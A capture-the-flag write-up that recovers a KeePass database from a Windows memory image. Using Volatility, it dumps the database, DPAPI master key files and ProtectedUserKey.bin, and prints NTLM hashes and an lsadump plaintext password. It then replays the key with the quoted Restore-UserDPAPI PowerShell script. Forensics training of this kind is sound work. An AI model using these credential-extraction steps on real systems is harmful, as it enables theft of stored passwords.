Kaspersky helpme

General analysis

Inspect the properties of the memory image

volatility -f ./memory.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/flier/Desktop/karspersky/helpme/memory.vmem)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82961be8L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0x82962c00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2017-09-25 12:18:53 UTC+0000
Image local date and time : 2017-09-25 15:18:53 +0300

List the processes in the memory image

volatility -f ./memory.vmem --profile=Win7SP0x86 pstree
Volatility Foundation Volatility Framework 2.6
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x86aa8328:wininit.exe 400 336 3 74 2017-09-25 12:08:15 UTC+0000
. 0x86d28558:lsm.exe 516 400 9 141 2017-09-25 12:08:15 UTC+0000
. 0x8cbc0030:services.exe 500 400 7 191 2017-09-25 12:08:15 UTC+0000
.. 0x86f094f8:svchost.exe 768 500 20 452 2017-09-25 12:08:16 UTC+0000
.. 0x870aa3b8:vmtoolsd.exe 1684 500 9 288 2017-09-25 12:08:18 UTC+0000
... 0x85730030:cmd.exe 1956 1684 0 ------ 2017-09-25 12:18:53 UTC+0000
.... 0x86185880:ipconfig.exe 3096 1956 0 ------ 2017-09-25 12:18:53 UTC+0000
.. 0x86fbd500:spoolsv.exe 1304 500 13 324 2017-09-25 12:08:17 UTC+0000
.. 0x86f42860:svchost.exe 924 500 35 910 2017-09-25 12:08:16 UTC+0000
.. 0x86ee49d0:vmacthlp.exe 680 500 3 53 2017-09-25 12:08:16 UTC+0000
.. 0x86da7a58:svchost.exe 884 500 19 430 2017-09-25 12:08:16 UTC+0000
... 0x87036030:dwm.exe 1492 884 5 113 2017-09-25 12:08:17 UTC+0000
.. 0x86fd9538:svchost.exe 1344 500 20 307 2017-09-25 12:08:17 UTC+0000
.. 0x870ded40:msdtc.exe 2252 500 14 154 2017-09-25 12:08:29 UTC+0000
.. 0x86c3a7b8:svchost.exe 716 500 8 251 2017-09-25 12:08:16 UTC+0000
.. 0x86f81030:svchost.exe 1144 500 15 369 2017-09-25 12:08:16 UTC+0000
.. 0x8722cd40:SearchIndexer. 2008 500 12 558 2017-09-25 12:08:26 UTC+0000
.. 0x8709c6a8:VGAuthService. 1636 500 3 87 2017-09-25 12:08:18 UTC+0000
.. 0x85085488:sppsvc.exe 3808 500 4 151 2017-09-25 12:10:21 UTC+0000
.. 0x86dcb030:svchost.exe 620 500 11 350 2017-09-25 12:08:15 UTC+0000
... 0x86313800:WmiPrvSE.exe 1732 620 10 199 2017-09-25 12:08:25 UTC+0000
... 0x872a8848:WmiPrvSE.exe 2552 620 9 219 2017-09-25 12:08:45 UTC+0000
.. 0x86f71b78:svchost.exe 1064 500 12 560 2017-09-25 12:08:16 UTC+0000
.. 0x856aea58:svchost.exe 3844 500 12 350 2017-09-25 12:10:21 UTC+0000
.. 0x870107a0:taskhost.exe 1400 500 7 150 2017-09-25 12:08:17 UTC+0000
.. 0x871f1480:dllhost.exe 852 500 15 199 2017-09-25 12:08:25 UTC+0000
. 0x86d2c188:lsass.exe 508 400 6 538 2017-09-25 12:08:15 UTC+0000
0x86b11d40:csrss.exe 348 336 8 415 2017-09-25 12:08:15 UTC+0000
. 0x8504a7d8:conhost.exe 476 348 0 ------ 2017-09-25 12:18:53 UTC+0000
0x8703cc48:explorer.exe 1508 1476 24 763 2017-09-25 12:08:17 UTC+0000
. 0x87100030:vmtoolsd.exe 1792 1508 7 198 2017-09-25 12:08:19 UTC+0000
. 0x872a9458:KeePass.exe 2464 1508 7 304 2017-09-25 12:08:33 UTC+0000
0x84f4a8e8:System 4 0 87 397 2017-09-25 12:08:14 UTC+0000
. 0x8c537930:smss.exe 264 4 2 29 2017-09-25 12:08:14 UTC+0000
0x86bb5d40:csrss.exe 408 392 10 192 2017-09-25 12:08:15 UTC+0000
0x86ca2920:winlogon.exe 456 392 3 117 2017-09-25 12:08:15 UTC+0000

Dump the screenshots

volatility -f ./memory.vmem --profile=Win7SP0x86 screenshot -D ./dump_true
Volatility Foundation Volatility Framework 2.6
Wrote ./dump_true/session_0.msswindowstation.mssrestricteddesk.png
Wrote ./dump_true/session_0.Service-0x0-3e4$.Default.png
Wrote ./dump_true/session_0.Service-0x0-3e5$.Default.png
Wrote ./dump_true/session_1.WinSta0.Default.png
Wrote ./dump_true/session_1.WinSta0.Disconnect.png
Wrote ./dump_true/session_1.WinSta0.Winlogon.png
Wrote ./dump_true/session_0.Service-0x0-3e7$.Default.png
Wrote ./dump_true/session_0.WinSta0.Default.png
Wrote ./dump_true/session_0.WinSta0.Disconnect.png
Wrote ./dump_true/session_0.WinSta0.Winlogon.png

KeePass

  • Something stands out here: the KeePass password manager has a database called FlagDatabase.kdbx open
  • So, scan for the file
volatility -f ./memory.vmem --profile=Win7SP0x86 filescan | grep FlagDatabase.kdbx
Volatility Foundation Volatility Framework 2.6
0x000000003daeb2c0 8 0 R--r-- \Device\HarddiskVolume1\Users\user\FlagDatabase.kdbx
  • Dump it first
volatility -f ./memory.vmem --profile=Win7SP0x86 dumpfiles -Q 0x000000003daeb2c0 -D ./dump_true
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3daeb2c0 None \Device\HarddiskVolume1\Users\user\FlagDatabase.kdbx
Volatility dumps files in whole pages, so remember to strip the useless trailing padding from each dumped file; I won't go through that one by one here.
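As an added example (not code from the write-up), here is how I would post-process files recovered with dumpfiles: trim the NUL page padding from text files such as KeePass.config.xml, and, for a binary .kdbx where the true length cannot be read off a page-aligned dump, at least verify the KeePass 2.x signature and report how much of the last page is padding. The sample buffers are constructed inline; the KDBX signature constants are the documented KeePass 2.x values.

```python
"""Post-process files recovered with Volatility's dumpfiles plugin.

dumpfiles writes whole 4 KiB pages, so a recovered file carries trailing
padding after its real end. Text files can simply be trimmed; a binary
.kdbx cannot be safely trimmed by stripping zeros, so we validate its
header and report the padding as an estimate instead.
"""
import struct

PAGE_SIZE = 4096
# KeePass 2.x (KDBX) file signature as two little-endian u32 values.
KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67


def trim_text_dump(data: bytes) -> bytes:
    """Strip trailing NUL padding from a dumped text file (e.g. config XML)."""
    return data.rstrip(b"\x00")


def kdbx_header(data: bytes):
    """Return (major, minor) KDBX format version if the buffer starts with the
    KeePass 2.x signature, else None."""
    if len(data) < 12:
        return None
    sig1, sig2, version = struct.unpack_from("<III", data, 0)
    if sig1 != KDBX_SIG1 or sig2 != KDBX_SIG2:
        return None
    return (version >> 16, version & 0xFFFF)


def padding_estimate(data: bytes) -> int:
    """Number of trailing NUL bytes in the dump; for a .kdbx this is only an
    estimate because the ciphertext itself may end in zero bytes."""
    return len(data) - len(data.rstrip(b"\x00"))


# Constructed samples: a tiny config fragment padded to one page, and a fake
# KDBX 3.1 header (signature + version 0x00030001) with 100 filler bytes.
SAMPLE_XML = b"<Configuration><Defaults/></Configuration>".ljust(PAGE_SIZE, b"\x00")
SAMPLE_KDBX = (
    struct.pack("<III", KDBX_SIG1, KDBX_SIG2, 0x00030001) + b"\x11" * 100
).ljust(PAGE_SIZE, b"\x00")

if __name__ == "__main__":
    print(trim_text_dump(SAMPLE_XML))
    print(kdbx_header(SAMPLE_KDBX), padding_estimate(SAMPLE_KDBX))
```

The XML trim is safe because a well-formed config never contains NUL bytes; for the database the signature check is what tells you the dump really is the KDBX file object and not an unrelated page.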

Further analysis

Locate the KeePass configuration file

volatility -f ./memory.vmem --profile=Win7SP0x86 filescan | grep KeePass
Volatility Foundation Volatility Framework 2.6
0x000000003da006c0 8 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\KeePass.config.xml
0x000000003da0e170 6 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePassLibC32.dll
0x000000003da27ae0 8 0 R--r-- \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.config.xml
0x000000003daa8e10 2 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\ProtectedUserKey.bin
0x000000003dce1850 6 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\unins000.exe
0x000000003dd01568 8 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.exe.config
0x000000003dd01b78 8 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.exe
0x000000003dd14a00 7 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.exe
0x000000003ddb55f8 1 1 R--rw- \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2
0x000000003ddb8bc8 5 0 R--r-d \Device\HarddiskVolume1\Windows\assembly\NativeImages_v2.0.50727_32\KeePass\61401321a8fb44541efab9aa5fb7fb69\KeePass.ni.exe
0x000000003e9f8468 8 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.XmlSerializers.dll
0x000000003e9f8678 4 1 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.XmlSerializers.dll
0x000000003ef96eb8 8 0 R--rw- \Device\HarddiskVolume1\Users\user\Desktop\KeePass 2.lnk
0x000000003ff6deb8 8 0 R--rw- \Device\HarddiskVolume1\Users\user\Desktop\KeePass 2.lnk
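Triage of filescan output like the above is what drives the rest of this write-up, so here is an added example (not from the original post) that parses Volatility 2 filescan lines and flags the credential-bearing artifacts a defender should care about: the .kdbx database, KeePass.config.xml, ProtectedUserKey.bin, and the per-user DPAPI Protect\<SID>\ files (Preferred and the GUID-named master key). The sample lines are constructed from the output shown on this page; the offset of the GUID master key line is made up, since the page never shows that line.

```python
"""Parse Volatility 2 `filescan` output and flag DPAPI / KeePass artifacts."""
import re

# Volatility 2 filescan columns: Offset(P)  #Ptr  #Hnd  Access  Name
FILESCAN_LINE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(.+?)\s*$")
GUID_NAME = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.IGNORECASE
)

# Constructed sample based on the write-up's filescan results (last line's
# offset is invented: the page only mentions that file by path).
SAMPLE_FILESCAN = r"""Volatility Foundation Volatility Framework 2.6
0x000000003daeb2c0 8 0 R--r-- \Device\HarddiskVolume1\Users\user\FlagDatabase.kdbx
0x000000003da006c0 8 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\KeePass.config.xml
0x000000003da0e170 6 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePassLibC32.dll
0x000000003daa8e10 2 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\ProtectedUserKey.bin
0x000000003daa8d58 2 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-196189514-4237867838-3788442389-1000\Preferred
0x000000003daa8f00 2 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-196189514-4237867838-3788442389-1000\7315eeac-ce04-46ff-87ac-4fc9cf1d41d3
"""


def parse_filescan(text: str):
    """Return one dict per file object line; header/noise lines are skipped."""
    records = []
    for line in text.splitlines():
        m = FILESCAN_LINE.match(line)
        if not m:
            continue
        offset, ptrs, hnds, access, path = m.groups()
        records.append({"offset": offset, "ptr": int(ptrs), "hnd": int(hnds),
                        "access": access, "path": path})
    return records


def classify(path: str):
    """Map a file path to an artifact category, or None if uninteresting."""
    lower = path.lower()
    name = path.rsplit("\\", 1)[-1]
    if lower.endswith(".kdbx"):
        return "keepass-database"
    if lower.endswith("\\keepass.config.xml"):
        return "keepass-config"
    if lower.endswith("\\protecteduserkey.bin"):
        return "keepass-useraccount-key"
    if "\\microsoft\\protect\\s-1-" in lower:
        if name.lower() == "preferred":
            return "dpapi-preferred"
        if GUID_NAME.match(name):
            return "dpapi-masterkey"
    return None


def find_credential_artifacts(text: str):
    """Return (category, offset, path) for every flagged file object, in input order."""
    hits = []
    for rec in parse_filescan(text):
        cat = classify(rec["path"])
        if cat:
            hits.append((cat, rec["offset"], rec["path"]))
    return hits


if __name__ == "__main__":
    for cat, off, path in find_credential_artifacts(SAMPLE_FILESCAN):
        print(f"{cat:24} {off}  {path}")
```

The offsets it returns are exactly what `dumpfiles -Q` expects, and seeing all five categories together in one user's profile is the signal that the database is protected by nothing the memory image does not also contain.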

Dump \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\KeePass.config.xml

volatility -f ./memory.vmem --profile=Win7SP0x86 dumpfiles -Q 0x000000003da006c0 -D ./dump_true
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3da006c0 None \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\KeePass.config.xml

Analyze the configuration file

</PasswordGenerator>
<Defaults>
  <OptionsTabIndex>0</OptionsTabIndex>
  <SearchParameters>
    <ComparisonMode>InvariantCultureIgnoreCase</ComparisonMode>
  </SearchParameters>
  <KeySources>
    <Association>
      <DatabasePath>..\..\Users\user\FlagDatabase.kdbx</DatabasePath>
      <UserAccount>true</UserAccount>
    </Association>
  </KeySources>
</Defaults>
<Integration>
  <HotKeyGlobalAutoType>393281</HotKeyGlobalAutoType>
  <HotKeySelectedAutoType>0</HotKeySelectedAutoType>
  <HotKeyShowWindow>393291</HotKeyShowWindow>
  • UserAccount is set to true here, which means the database is encrypted with the Windows user account's master key
  • Since no other key option is present, the Windows account credential is the only form of protection on this database
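The inference above (user account is the only key source) can be automated as a configuration audit. Here is an added example, not part of the write-up, that parses the KeySources section of KeePass.config.xml and reports databases protected solely by the Windows user account. The DatabasePath and UserAccount elements come from the page; the Password and KeyFilePath element names are the other fields KeePass 2.x records per association and are an assumption of this example, as is the second sample association.

```python
"""Audit KeePass.config.xml for databases whose only key source is the
Windows user account (DPAPI), i.e. ones that fall to a DPAPI master key
replay once the account's credentials are known."""
import xml.etree.ElementTree as ET

# Constructed sample modelled on the fragment recovered in the write-up,
# plus a second (invented) association that also uses a password and key file.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <Defaults>
    <KeySources>
      <Association>
        <DatabasePath>..\\..\\Users\\user\\FlagDatabase.kdbx</DatabasePath>
        <UserAccount>true</UserAccount>
      </Association>
      <Association>
        <DatabasePath>..\\..\\Users\\user\\Work.kdbx</DatabasePath>
        <Password>true</Password>
        <KeyFilePath>D:\\keys\\work.key</KeyFilePath>
        <UserAccount>true</UserAccount>
      </Association>
    </KeySources>
  </Defaults>
</Configuration>
"""


def _flag(assoc, name: str) -> bool:
    """True if the child element exists and reads 'true'."""
    el = assoc.find(name)
    return el is not None and (el.text or "").strip().lower() == "true"


def audit_key_sources(config_xml: str):
    """Return a list of (database_path, key_sources, weak) tuples.

    weak is True when 'useraccount' is the only key source for the database."""
    root = ET.fromstring(config_xml)
    results = []
    for assoc in root.iterfind("./Defaults/KeySources/Association"):
        path = (assoc.findtext("DatabasePath") or "").strip()
        sources = []
        if _flag(assoc, "Password"):
            sources.append("password")
        if (assoc.findtext("KeyFilePath") or "").strip():
            sources.append("keyfile")
        if _flag(assoc, "UserAccount"):
            sources.append("useraccount")
        results.append((path, sources, sources == ["useraccount"]))
    return results


if __name__ == "__main__":
    for path, sources, weak in audit_key_sources(SAMPLE_CONFIG):
        print(("WEAK " if weak else "ok   ") + path, sources)
```

KeySources only records what KeePass remembered for that database, so the audit tells you what the user configured, which is exactly the inference the write-up draws from UserAccount being the sole element.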

Heading for the answer

Reference: http://www.harmj0y.net/blog/redteaming/a-case-study-in-attacking-keepass/

To recover, on another operating system, a KeePass database encrypted with Windows user account authentication, we need the following:

  • All files under the %APPDATA%\Microsoft\Protect\ directory
    • Preferred
    • the master key file named with a GUID (the Windows account's master key file)
  • The software master key that KeePass uses for encryption
    • ProtectedUserKey.bin
  • The Windows account's information
    • UserDomain
    • password
    • SID
    • UserName
  • xxxx.kdbx, the encrypted key database

Right now, what we are still missing is:

  • All files under the %APPDATA%\Microsoft\Protect\ directory
  • The software master key that KeePass uses for encryption
  • The Windows account's information

Get the files in the SID directory

filescan shows the Preferred file:

0x000000003daa8d58 2 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-196189514-4237867838-3788442389-1000\Preferred

volatility -f ./memory.vmem --profile=Win7SP0x86 dumpfiles -Q 0x000000003daa8d58 -D ./dump_true
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3daa8d58 None \Device\HarddiskVolume1\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-196189514-4237867838-3788442389-1000\Preferred
There is a pitfall here: the Windows master key file \Device\HarddiskVolume1\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-196189514-4237867838-3788442389-1000\7315eeac-ce04-46ff-87ac-4fc9cf1d41d3 cannot be dumped this way.

With no alternative, I had to search memory for it using the master key file's characteristic layout.

Master key

ProtectedUserKey.bin

volatility -f ./memory.vmem --profile=Win7SP0x86 dumpfiles -Q 0x000000003daa8e10 -D ./dump_true
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3daa8e10 None \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\ProtectedUserKey.bin

Get the user information

Tried hashdump, but the password is too long to crack

volatility -f ./memory.vmem --profile=Win7SP0x86 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user:1000:aad3b435b51404eeaad3b435b51404ee:8943ccc24f82983c8b791b7f648679c0:::

Tried rekall's mimikatz plugin, and that did it

rekall -f memory.vmem mimikatz

lsadump also works

volatility -f ./memory.vmem --profile=Win7SP0x86 lsadump
Volatility Foundation Volatility Framework 2.6
DefaultPassword
0x00000000 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 N...............
0x00000010 79 00 6f 00 75 00 5f 00 6e 00 65 00 65 00 64 00 y.o.u._.n.e.e.d.
0x00000020 5f 00 61 00 6e 00 6f 00 74 00 68 00 65 00 72 00 _.a.n.o.t.h.e.r.
0x00000030 5f 00 6b 00 65 00 79 00 5f 00 74 00 6f 00 5f 00 _.k.e.y._.t.o._.
0x00000040 70 00 61 00 73 00 73 00 5f 00 74 00 68 00 69 00 p.a.s.s._.t.h.i.
0x00000050 73 00 5f 00 6c 00 65 00 76 00 65 00 6c 00 00 00 s._.l.e.v.e.l...
DPAPI_SYSTEM
0x00000000 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ,...............
0x00000010 01 00 00 00 b8 5c 72 98 16 2b f1 72 c9 84 2c 68 .....\r..+.r..,h
0x00000020 f3 07 bb 2b e6 ce 6a 4b 73 f1 ec fa a6 51 61 7d ...+..jKs....Qa}
0x00000030 4a 82 97 61 db 55 d2 34 e8 df 7f b8 00 00 00 00 J..a.U.4........

The password is you_need_another_key_to_pass_this_level, damn that's long
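Reading the password off the ASCII column works, but a short decoder makes the structure explicit: the LSA secret is a 4-byte little-endian length (0x4e = 78 bytes), twelve bytes of zeros, then the UTF-16LE string, which is why every character is followed by a dot. This is an added example, not from the write-up; the sample text is the DefaultPassword and DPAPI_SYSTEM blocks exactly as they appear above. It also shows why a DefaultPassword (autologon) secret in LSA is worth flagging in any memory triage: the plaintext credential sits right there.

```python
"""Decode Volatility 2 `lsadump` hex output back into secrets."""
import re
import struct

# "0x00000010 79 00 6f 00 ... 64 00 y.o.u._.n.e.e.d." -> offset + up to 16 bytes
HEX_LINE = re.compile(r"^0x([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}\s+){1,16})")

# Constructed sample: the two secrets from the write-up's lsadump output.
SAMPLE_LSADUMP = """Volatility Foundation Volatility Framework 2.6
DefaultPassword
0x00000000 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 N...............
0x00000010 79 00 6f 00 75 00 5f 00 6e 00 65 00 65 00 64 00 y.o.u._.n.e.e.d.
0x00000020 5f 00 61 00 6e 00 6f 00 74 00 68 00 65 00 72 00 _.a.n.o.t.h.e.r.
0x00000030 5f 00 6b 00 65 00 79 00 5f 00 74 00 6f 00 5f 00 _.k.e.y._.t.o._.
0x00000040 70 00 61 00 73 00 73 00 5f 00 74 00 68 00 69 00 p.a.s.s._.t.h.i.
0x00000050 73 00 5f 00 6c 00 65 00 76 00 65 00 6c 00 00 00 s._.l.e.v.e.l...
DPAPI_SYSTEM
0x00000000 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ,...............
0x00000010 01 00 00 00 b8 5c 72 98 16 2b f1 72 c9 84 2c 68 .....\\r..+.r..,h
0x00000020 f3 07 bb 2b e6 ce 6a 4b 73 f1 ec fa a6 51 61 7d ...+..jKs....Qa}
0x00000030 4a 82 97 61 db 55 d2 34 e8 df 7f b8 00 00 00 00 J..a.U.4........
"""


def parse_lsadump(text: str) -> dict:
    """Return {secret_name: raw_bytes}; the banner line is ignored."""
    secrets, current = {}, None
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            if current is not None:
                secrets[current] += bytes.fromhex(m.group(2).replace(" ", ""))
            continue
        name = line.strip()
        if name and not name.startswith("Volatility"):
            current = name
            secrets[current] = b""
    return secrets


def decode_lsa_string(raw: bytes) -> str:
    """Decode a length-prefixed UTF-16LE secret such as DefaultPassword:
    u32 byte length at offset 0, string data starting at offset 16."""
    length = struct.unpack_from("<I", raw, 0)[0]
    return raw[16:16 + length].decode("utf-16-le")


def secret_lengths(secrets: dict) -> dict:
    """Map each secret name to the byte length stored in its u32 prefix."""
    return {name: struct.unpack_from("<I", raw, 0)[0] for name, raw in secrets.items()}


if __name__ == "__main__":
    found = parse_lsadump(SAMPLE_LSADUMP)
    print(secret_lengths(found))
    print(decode_lsa_string(found["DefaultPassword"]))
```

The length prefix is the check that matters: 78 bytes is 39 UTF-16 code units, which matches the 39-character string, so nothing was truncated by the hex dump.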

Get the account information

The envars plugin output for explorer.exe gives us USERDOMAIN and USERNAME:

1508 explorer.exe 0x002ebf88 PUBLIC C:\Users\Public
1508 explorer.exe 0x002ebf88 SESSIONNAME Console
1508 explorer.exe 0x002ebf88 SystemDrive C:
1508 explorer.exe 0x002ebf88 SystemRoot C:\Windows
1508 explorer.exe 0x002ebf88 TEMP C:\Users\user\AppData\Local\Temp
1508 explorer.exe 0x002ebf88 TMP C:\Users\user\AppData\Local\Temp
1508 explorer.exe 0x002ebf88 USERDOMAIN WIN-GFCKT3R8MQ2
1508 explorer.exe 0x002ebf88 USERNAME user
1508 explorer.exe 0x002ebf88 USERPROFILE C:\Users\user
1508 explorer.exe 0x002ebf88 windir C:\Windows
1636 VGAuthService. 0x003207f0 ALLUSERSPROFILE C:\ProgramData
1636 VGAuthService. 0x003207f0 APPDATA C:\Windows\system32\config\systemprofile\AppD

Recover the KeePass-encrypted data

Restore-UserDPAPI -Path C:\Users\W\Desktop\S-1-5-21-196189514-4237867838-3788442389-1000 -UserName user -UserDomain WIN-GFCKT3R8MQ2 -ProtectedUserKey C:\Users\W\Desktop\ProtectedUserKey.bin

The Restore-UserDPAPI script is as follows

function Restore-UserDPAPI {
<#
.SYNOPSIS
Restores a user account's DPAPI master key on a new system.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
This function will take a backup of a user's DPAPI master key folder (C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\),
copies the folder to %APPDATA%\Microsoft\Protect\ for the current user on a new machine, sets several
DPAPI MigratedUsers registry keys necessary, and invokes dpapimig.exe to kick off "Protected Content Migration".
If the password for the user account associated with the master key differs from the current user's,
the "Protected Content Migration" GUI will prompt for the old user password.
There is more information on this process from KeePass at https://sourceforge.net/p/keepass/wiki/Recover%20Windows%20User%20Account%20Credentials/
.PARAMETER Path
The C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\ folder to restore, must be in S-1-... SID format.
.PARAMETER UserName
The username linked to the folder to restore.
.PARAMETER UserDomain
The domain (or local machine) linked to the UserName/folder.
.PARAMETER ProtectedUserKey
The path to an optional ProtectedUserKey.bin KeePass DPAPI blob.
.EXAMPLE
PS C:\Temp> Restore-UserDPAPI -Path C:\Temp\S-1-5-21-456218688-4216621462-1491369290-1210\ -UserName testuser -UserDomain testlab.local
Restores the DPAPI master key for the testlab.local\testuser (SID=S-1-5-21-456218688-4216621462-1491369290-1210) from
the C:\Temp\S-1-5-21-456218688-4216621462-1491369290-1210\ backup folder.
.EXAMPLE
PS C:\Temp> Restore-UserDPAPI -Path C:\Temp\S-1-5-21-456218688-4216621462-1491369290-1210\ -UserName testuser -UserDomain testlab.local -ProtectedUserKey ProtectedUserKey.bin
Restores the DPAPI master key for the testlab.local\testuser (SID=S-1-5-21-456218688-4216621462-1491369290-1210) from
the C:\Temp\S-1-5-21-456218688-4216621462-1491369290-1210\ backup folder, and copies the KeePass-specific
ProtectedUserKey.bin DPAPI blob into the proper location.
.LINK
https://sourceforge.net/p/keepass/wiki/Recover%20Windows%20User%20Account%20Credentials/
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
[ValidateScript({ Test-Path -Path $_ })]
[String]
$Path,
[Parameter(Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[String]
$UserName,
[Parameter(Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[String]
$UserDomain,
[ValidatePattern('.*ProtectedUserKey\.bin')]
[ValidateScript({ Test-Path -Path $_ })]
[Alias('KeePassBlob')]
[String]
$ProtectedUserKey
)
$UserFolder = Get-Item $Path
$SID = $UserFolder.Name
if($SID -notmatch '^S-1-.*') {
throw "User folder must be in 'S-1-...' SID format!"
}
Write-Host "`n[*] Copying $($UserFolder.FullName) DPAPI folder to $ENV:APPDATA\Microsoft\Protect\"
Copy-Item -Path $UserFolder -Destination $ENV:APPDATA\Microsoft\Protect\ -Recurse -Force
Write-Host "`n[*] Creating DPAPI MigratedUsers registry keys"
$Null = New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DPAPI\MigratedUsers\$SID\UserDomain" -Force
$Null = New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DPAPI\MigratedUsers\$SID\UserDomain" -Name $UserDomain -Force
$Null = New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DPAPI\MigratedUsers\$SID\UserName" -Force
$Null = New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DPAPI\MigratedUsers\$SID\UserName" -Name $UserName -Force
Write-Host "`n[*] Calling dpapimig.exe... (this may take just a bit)`n"
Start-Process $ENV:WINDIR\System32\dpapimig.exe -NoNewWindow -Wait
if($PSBoundParameters['ProtectedUserKey']) {
$ProtectedUserKeyFile = Get-Item $ProtectedUserKey
Write-Host "[*] Copying $($ProtectedUserKeyFile.FullName) to $ENV:APPDATA\KeePass\`n"
if (-not (Test-Path -Path $ENV:APPDATA\KeePass\)) { $Null = New-Item $ENV:APPDATA\KeePass\ -Type Directory }
Copy-Item -Path $ProtectedUserKeyFile -Destination $ENV:APPDATA\KeePass\ -Force
}
}

It will prompt for the password of the user being restored; just enter you_need_another_key_to_pass_this_level

Open KeePass and choose Windows user account authentication to unlock the database